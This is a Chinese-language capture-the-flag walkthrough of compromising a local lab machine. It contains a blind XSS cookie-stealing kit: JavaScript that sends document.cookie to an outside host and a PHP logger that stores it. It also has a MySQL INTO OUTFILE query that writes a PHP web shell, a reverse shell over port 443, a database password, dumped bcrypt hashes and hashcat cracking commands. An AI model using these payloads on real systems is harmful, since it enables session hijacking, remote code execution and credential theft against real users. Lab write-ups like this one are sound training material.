前言

扫目录时一定要多用几个扫描器扫…..

不然会去世…..

考点：

​ xss反弹cookie

​ hashcat 爆破密码

渗透过程

​ 靶机IP地址：192.168.1.112

​ Kali地址：192.168.1.76

​ 扫描靶机的IP，看看靶机的端口开了哪些

nmap -sS -A -Pn 192.168.1.112

​ 这里扫出来的端口有22,80,443,9090端口。

​ 443端口测试后，无法突破，所以把重点放在80端口和22端口。

​ 我用dirb，御剑，dirsearch扫描目录，用dirsearch才扫描出了后台，所以要有好的字典。

​ 在_admin中点击dist然后会跳转到

​ 这里我使用top10的弱口令不行，然后爆破密码也没有成功……

​ 想了很久，burp抓包的时候，注意到这个

​ 这个PHPSESSID相当可以，考虑到我们或许可以想办法获取到管理员的会话ID之类的。

​ 访问index.html，这里没有什么东西，但是到buynow.php

这里可能会有xss

<script>alert('xss')</scirpit>

但是用这个最简单的语句我弹了半天，什么都没有弹出来，可能这里是没有回显的那种。

本地搭一个反弹xss的脚本,参考https://www.jianshu.com/p/0f5974c386cb

平台文件有三个：cookie.txt hacker.js hacker.php

hacker.js
//通过指定的名称'img'创建img元素
var img = document.createElement('img');
img.width = 0;
img.height = 0;

//将img元素的src属性指向脚本文件hacker.php
//将cookie信息的字符串作为URI组件进行编码，然后用ck参数传递
img.src = 'http://www.hacktest.com:8002/xss/hacker.php?ck='+encodeURIComponent(document.cookie);


hacker.php
<?php
    @ini_set('display_errors',1);   //PHP开启展示错误信息（若有错误的情况下）
    $cookie = $_GET['ck'];  //将ck参数传递的cookie信息以GET请求方式获取，赋给$cookie变量存储
    $fileName = "hacker.php";   //$fileName变量用以存放hacker.php脚本

    if(is_writable($fileName)==true){   //判断若文件$fileName存在且可写，则返回true
        date_default_timezone_set('PRC'); //设置中国时区，便于后面的$time获取的时间准确（不早不晚）
        $time = date('Y-m-d H:i:s');    //以"年-月-日 时:分:秒"的格式显示时间
        $ip = getenv('REMOTE_ADDR');    //远程主机IP地址
        $referer = getenv ('HTTP_REFERER'); //链接来源
        $agent = $_SERVER['HTTP_USER_AGENT']; //用户浏览器类型
        
        //以写入方式打开cookie.txt文件（若没有则创建TA）
        $fp = fopen('cookie.txt', "a");
        //将$ip、$time、$agent、$referer、$cookie变量对应的值写入到打开的cookie.txt文件中
        fwrite($fp,"IP: ".$ip."\n"."Time: ".$time."\n"."User Agent: ".$agent."\n"."Referer: ".$referer."\n"."Cookie: ".$cookie."\n");
        //将打开的文件关闭
        fclose($fp);
    }
    else{
        echo "Can't Write !";
    }
?>

<script src="http://192.168.1.9/xss/hacker.js"></script>

​ 反弹出admin用户的会话ID

​

​ 登陆到后台后记得每一步都要更换PHPSESSID

​ 尝试Mysql写shell

select "<?php echo system($_GET['cmd']); ?>" into outfile '/var/www/html/shell.php'

成功写入shell

然后反弹shell，kali监听7777端口。

但是用7777端口不能反弹shell，阴差阳错下试了一下443端口，发现443端口可以

​ 在home中发现有两个用户，一个是moneygrabber，想起之前的22端口，现在要做的就是找到moneygrabber的密码，可能ssh用的上。

​

​ 在web目录下寻找信息，发现config.php

​

​ 这里是用于连接数据库的数据，所以尝试获取数据库的数据

mysql -uorders -pOb2UA15ubBtzpZrvdMYT -e "SELECT * FROM users" orders >2.txt

userID  userName        password
1       admin   $2y$12$A4jqwtWB73.TAMIeplx0T.5oG/mnHR1qTDa8cmtTIvW3ZTjdSjdjC
2       m0n3y6r4bb3r    $2y$12$EX/FDsztTMwftzPRyY8gFuM7ZjAphQRZs88qpZpmboRogOAOYXowC

hashcat -a 0  -m 3200 test.txt /usr/share/wordlists/rockyou.txt

然后flag3暂时提权不怎么会…..